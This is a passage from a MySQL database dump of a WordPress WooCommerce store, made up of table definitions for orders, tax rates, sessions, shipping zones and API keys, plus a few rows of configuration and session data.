/*!40000 ALTER TABLE `wpev_wc_order_product_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_order_stats`
--

DROP TABLE IF EXISTS `wpev_wc_order_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_order_stats` (
  `order_id` bigint(20) unsigned NOT NULL,
  `parent_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `num_items_sold` int(11) NOT NULL DEFAULT 0,
  `total_sales` double NOT NULL DEFAULT 0,
  `tax_total` double NOT NULL DEFAULT 0,
  `shipping_total` double NOT NULL DEFAULT 0,
  `net_total` double NOT NULL DEFAULT 0,
  `returning_customer` tinyint(1) DEFAULT NULL,
  `status` varchar(200) NOT NULL,
  `customer_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_id`),
  KEY `date_created` (`date_created`),
  KEY `customer_id` (`customer_id`),
  KEY `status` (`status`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_order_stats`
--

LOCK TABLES `wpev_wc_order_stats` WRITE;
/*!40000 ALTER TABLE `wpev_wc_order_stats` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_order_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_order_tax_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_order_tax_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_order_tax_lookup` (
  `order_id` bigint(20) unsigned NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `shipping_tax` double NOT NULL DEFAULT 0,
  `order_tax` double NOT NULL DEFAULT 0,
  `total_tax` double NOT NULL DEFAULT 0,
  PRIMARY KEY (`order_id`,`tax_rate_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `date_created` (`date_created`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_order_tax_lookup`
--

LOCK TABLES `wpev_wc_order_tax_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_order_tax_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_order_tax_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_product_attributes_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_product_attributes_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_product_attributes_lookup` (
  `product_id` bigint(20) NOT NULL,
  `product_or_parent_id` bigint(20) NOT NULL,
  `taxonomy` varchar(32) NOT NULL,
  `term_id` bigint(20) NOT NULL,
  `is_variation_attribute` tinyint(1) NOT NULL,
  `in_stock` tinyint(1) NOT NULL,
  PRIMARY KEY (`product_or_parent_id`,`term_id`,`product_id`,`taxonomy`),
  KEY `is_variation_attribute_term_id` (`is_variation_attribute`,`term_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_product_attributes_lookup`
--

LOCK TABLES `wpev_wc_product_attributes_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_product_attributes_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_product_attributes_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_product_download_directories`
--

DROP TABLE IF EXISTS `wpev_wc_product_download_directories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_product_download_directories` (
  `url_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(256) NOT NULL,
  `enabled` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`url_id`),
  KEY `url` (`url`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_product_download_directories`
--

LOCK TABLES `wpev_wc_product_download_directories` WRITE;
/*!40000 ALTER TABLE `wpev_wc_product_download_directories` DISABLE KEYS */;
INSERT INTO `wpev_wc_product_download_directories` VALUES (1,'file:///home/fmedia/domains/bauhaus.futuremediatrix.com/public_html/wp-content/uploads/woocommerce_uploads/',1),(2,'https://bauhaus.futuremediatrix.com/wp-content/uploads/woocommerce_uploads/',1);
/*!40000 ALTER TABLE `wpev_wc_product_download_directories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_product_meta_lookup`
--

DROP TABLE IF EXISTS `wpev_wc_product_meta_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_product_meta_lookup` (
  `product_id` bigint(20) NOT NULL,
  `sku` varchar(100) DEFAULT '',
  `virtual` tinyint(1) DEFAULT 0,
  `downloadable` tinyint(1) DEFAULT 0,
  `min_price` decimal(19,4) DEFAULT NULL,
  `max_price` decimal(19,4) DEFAULT NULL,
  `onsale` tinyint(1) DEFAULT 0,
  `stock_quantity` double DEFAULT NULL,
  `stock_status` varchar(100) DEFAULT 'instock',
  `rating_count` bigint(20) DEFAULT 0,
  `average_rating` decimal(3,2) DEFAULT 0.00,
  `total_sales` bigint(20) DEFAULT 0,
  `tax_status` varchar(100) DEFAULT 'taxable',
  `tax_class` varchar(100) DEFAULT '',
  PRIMARY KEY (`product_id`),
  KEY `virtual` (`virtual`),
  KEY `downloadable` (`downloadable`),
  KEY `stock_status` (`stock_status`),
  KEY `stock_quantity` (`stock_quantity`),
  KEY `onsale` (`onsale`),
  KEY `min_max_price` (`min_price`,`max_price`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_product_meta_lookup`
--

LOCK TABLES `wpev_wc_product_meta_lookup` WRITE;
/*!40000 ALTER TABLE `wpev_wc_product_meta_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_product_meta_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_rate_limits`
--

DROP TABLE IF EXISTS `wpev_wc_rate_limits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_rate_limits` (
  `rate_limit_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `rate_limit_key` varchar(200) NOT NULL,
  `rate_limit_expiry` bigint(20) unsigned NOT NULL,
  `rate_limit_remaining` smallint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`rate_limit_id`),
  UNIQUE KEY `rate_limit_key` (`rate_limit_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_rate_limits`
--

LOCK TABLES `wpev_wc_rate_limits` WRITE;
/*!40000 ALTER TABLE `wpev_wc_rate_limits` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_rate_limits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_reserved_stock`
--

DROP TABLE IF EXISTS `wpev_wc_reserved_stock`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_reserved_stock` (
  `order_id` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `stock_quantity` double NOT NULL DEFAULT 0,
  `timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `expires` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`order_id`,`product_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_reserved_stock`
--

LOCK TABLES `wpev_wc_reserved_stock` WRITE;
/*!40000 ALTER TABLE `wpev_wc_reserved_stock` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_reserved_stock` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_tax_rate_classes`
--

DROP TABLE IF EXISTS `wpev_wc_tax_rate_classes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_tax_rate_classes` (
  `tax_rate_class_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_class_id`),
  UNIQUE KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_tax_rate_classes`
--

LOCK TABLES `wpev_wc_tax_rate_classes` WRITE;
/*!40000 ALTER TABLE `wpev_wc_tax_rate_classes` DISABLE KEYS */;
INSERT INTO `wpev_wc_tax_rate_classes` VALUES (1,'Reduced rate','reduced-rate'),(2,'Zero rate','zero-rate');
/*!40000 ALTER TABLE `wpev_wc_tax_rate_classes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_wc_webhooks`
--

DROP TABLE IF EXISTS `wpev_wc_webhooks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_wc_webhooks` (
  `webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `status` varchar(200) NOT NULL,
  `name` text NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `delivery_url` text NOT NULL,
  `secret` text NOT NULL,
  `topic` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `api_version` smallint(4) NOT NULL,
  `failure_count` smallint(10) NOT NULL DEFAULT 0,
  `pending_delivery` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`webhook_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_wc_webhooks`
--

LOCK TABLES `wpev_wc_webhooks` WRITE;
/*!40000 ALTER TABLE `wpev_wc_webhooks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_wc_webhooks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_api_keys`
--

DROP TABLE IF EXISTS `wpev_woocommerce_api_keys`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_api_keys` (
  `key_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL,
  `description` varchar(200) DEFAULT NULL,
  `permissions` varchar(10) NOT NULL,
  `consumer_key` char(64) NOT NULL,
  `consumer_secret` char(43) NOT NULL,
  `nonces` longtext DEFAULT NULL,
  `truncated_key` char(7) NOT NULL,
  `last_access` datetime DEFAULT NULL,
  PRIMARY KEY (`key_id`),
  KEY `consumer_key` (`consumer_key`),
  KEY `consumer_secret` (`consumer_secret`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_api_keys`
--

LOCK TABLES `wpev_woocommerce_api_keys` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_api_keys` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_api_keys` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_attribute_taxonomies`
--

DROP TABLE IF EXISTS `wpev_woocommerce_attribute_taxonomies`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_attribute_taxonomies` (
  `attribute_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `attribute_name` varchar(200) NOT NULL,
  `attribute_label` varchar(200) DEFAULT NULL,
  `attribute_type` varchar(20) NOT NULL,
  `attribute_orderby` varchar(20) NOT NULL,
  `attribute_public` int(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`attribute_id`),
  KEY `attribute_name` (`attribute_name`(20))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_attribute_taxonomies`
--

LOCK TABLES `wpev_woocommerce_attribute_taxonomies` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_attribute_taxonomies` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_attribute_taxonomies` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_downloadable_product_permissions`
--

DROP TABLE IF EXISTS `wpev_woocommerce_downloadable_product_permissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_downloadable_product_permissions` (
  `permission_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `download_id` varchar(36) NOT NULL,
  `product_id` bigint(20) unsigned NOT NULL,
  `order_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `order_key` varchar(200) NOT NULL,
  `user_email` varchar(200) NOT NULL,
  `user_id` bigint(20) unsigned DEFAULT NULL,
  `downloads_remaining` varchar(9) DEFAULT NULL,
  `access_granted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `access_expires` datetime DEFAULT NULL,
  `download_count` bigint(20) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`permission_id`),
  KEY `download_order_key_product` (`product_id`,`order_id`,`order_key`(16),`download_id`),
  KEY `download_order_product` (`download_id`,`order_id`,`product_id`),
  KEY `order_id` (`order_id`),
  KEY `user_order_remaining_expires` (`user_id`,`order_id`,`downloads_remaining`,`access_expires`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_downloadable_product_permissions`
--

LOCK TABLES `wpev_woocommerce_downloadable_product_permissions` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_downloadable_product_permissions` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_downloadable_product_permissions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_log`
--

DROP TABLE IF EXISTS `wpev_woocommerce_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_log` (
  `log_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `timestamp` datetime NOT NULL,
  `level` smallint(4) NOT NULL,
  `source` varchar(200) NOT NULL,
  `message` longtext NOT NULL,
  `context` longtext DEFAULT NULL,
  PRIMARY KEY (`log_id`),
  KEY `level` (`level`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_log`
--

LOCK TABLES `wpev_woocommerce_log` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_order_itemmeta`
--

DROP TABLE IF EXISTS `wpev_woocommerce_order_itemmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_order_itemmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `order_item_id` (`order_item_id`),
  KEY `meta_key` (`meta_key`(32))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_order_itemmeta`
--

LOCK TABLES `wpev_woocommerce_order_itemmeta` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_order_itemmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_order_itemmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_order_items`
--

DROP TABLE IF EXISTS `wpev_woocommerce_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_order_items` (
  `order_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_name` text NOT NULL,
  `order_item_type` varchar(200) NOT NULL DEFAULT '',
  `order_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_order_items`
--

LOCK TABLES `wpev_woocommerce_order_items` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_order_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_payment_tokenmeta`
--

DROP TABLE IF EXISTS `wpev_woocommerce_payment_tokenmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_payment_tokenmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `payment_token_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `payment_token_id` (`payment_token_id`),
  KEY `meta_key` (`meta_key`(32))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_payment_tokenmeta`
--

LOCK TABLES `wpev_woocommerce_payment_tokenmeta` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_payment_tokenmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_payment_tokenmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_payment_tokens`
--

DROP TABLE IF EXISTS `wpev_woocommerce_payment_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_payment_tokens` (
  `token_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `gateway_id` varchar(200) NOT NULL,
  `token` text NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `type` varchar(200) NOT NULL,
  `is_default` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`token_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_payment_tokens`
--

LOCK TABLES `wpev_woocommerce_payment_tokens` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_payment_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_payment_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_sessions`
--

DROP TABLE IF EXISTS `wpev_woocommerce_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) NOT NULL,
  `session_value` longtext NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_id`),
  UNIQUE KEY `session_key` (`session_key`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_sessions`
--

LOCK TABLES `wpev_woocommerce_sessions` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_sessions` DISABLE KEYS */;
INSERT INTO `wpev_woocommerce_sessions` VALUES (1,'1','a:7:{s:4:\"cart\";s:6:\"a:0:{}\";s:11:\"cart_totals\";s:367:\"a:15:{s:8:\"subtotal\";i:0;s:12:\"subtotal_tax\";i:0;s:14:\"shipping_total\";i:0;s:12:\"shipping_tax\";i:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";i:0;s:12:\"discount_tax\";i:0;s:19:\"cart_contents_total\";i:0;s:17:\"cart_contents_tax\";i:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";i:0;s:7:\"fee_tax\";i:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";i:0;s:9:\"total_tax\";i:0;}\";s:15:\"applied_coupons\";s:6:\"a:0:{}\";s:22:\"coupon_discount_totals\";s:6:\"a:0:{}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:8:\"customer\";s:745:\"a:27:{s:2:\"id\";s:1:\"1\";s:13:\"date_modified\";s:0:\"\";s:8:\"postcode\";s:0:\"\";s:4:\"city\";s:0:\"\";s:9:\"address_1\";s:0:\"\";s:7:\"address\";s:0:\"\";s:9:\"address_2\";s:0:\"\";s:5:\"state\";s:2:\"CA\";s:7:\"country\";s:2:\"US\";s:17:\"shipping_postcode\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:2:\"CA\";s:16:\"shipping_country\";s:2:\"US\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:7:\"company\";s:0:\"\";s:5:\"phone\";s:0:\"\";s:5:\"email\";s:24:\"ardy@futuremediatrix.com\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";s:14:\"shipping_phone\";s:0:\"\";}\";}',1668569321);
/*!40000 ALTER TABLE `wpev_woocommerce_sessions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_shipping_zone_locations`
--

DROP TABLE IF EXISTS `wpev_woocommerce_shipping_zone_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_shipping_zone_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_id` bigint(20) unsigned NOT NULL,
  `location_code` varchar(200) NOT NULL,
  `location_type` varchar(40) NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `location_id` (`location_id`),
  KEY `location_type_code` (`location_type`(10),`location_code`(20))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_shipping_zone_locations`
--

LOCK TABLES `wpev_woocommerce_shipping_zone_locations` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_shipping_zone_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_shipping_zone_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_shipping_zone_methods`
--

DROP TABLE IF EXISTS `wpev_woocommerce_shipping_zone_methods`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_shipping_zone_methods` (
  `zone_id` bigint(20) unsigned NOT NULL,
  `instance_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `method_id` varchar(200) NOT NULL,
  `method_order` bigint(20) unsigned NOT NULL,
  `is_enabled` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`instance_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_shipping_zone_methods`
--

LOCK TABLES `wpev_woocommerce_shipping_zone_methods` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_shipping_zone_methods` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_shipping_zone_methods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_shipping_zones`
--

DROP TABLE IF EXISTS `wpev_woocommerce_shipping_zones`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_shipping_zones` (
  `zone_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `zone_name` varchar(200) NOT NULL,
  `zone_order` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`zone_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_shipping_zones`
--

LOCK TABLES `wpev_woocommerce_shipping_zones` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_shipping_zones` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_shipping_zones` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_tax_rate_locations`
--

DROP TABLE IF EXISTS `wpev_woocommerce_tax_rate_locations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_tax_rate_locations` (
  `location_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `location_code` varchar(200) NOT NULL,
  `tax_rate_id` bigint(20) unsigned NOT NULL,
  `location_type` varchar(40) NOT NULL,
  PRIMARY KEY (`location_id`),
  KEY `tax_rate_id` (`tax_rate_id`),
  KEY `location_type_code` (`location_type`(10),`location_code`(20))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_woocommerce_tax_rate_locations`
--

LOCK TABLES `wpev_woocommerce_tax_rate_locations` WRITE;
/*!40000 ALTER TABLE `wpev_woocommerce_tax_rate_locations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_woocommerce_tax_rate_locations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_woocommerce_tax_rates`
--

DROP TABLE IF EXISTS `wpev_woocommerce_tax_rates`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_woocommerce_tax_rates` (
  `tax_rate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `tax_rate_country` varchar(2) NOT NULL DEFAULT '',
  `tax_rate_state` varchar(200) NOT NULL DEFAULT '',
  `tax_rate` varchar(8) NOT NULL DEFAULT '',
  `tax_rate_name` varchar(200) NOT NULL DEFAULT '',
  `tax_rate_priority` bigint(20) unsigned NOT NULL,
  `tax_rate_compound` int(1) NOT NULL DEFAULT 0,
  `tax_rate_shipping` int(1) NOT NULL DEFAULT 1,
  `tax_rate_order` bigint(20) unsigned NOT NULL,
  `tax_rate_class` varchar(200) NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_id`),
  KEY `tax_rate_country` (`tax_rate_country`),
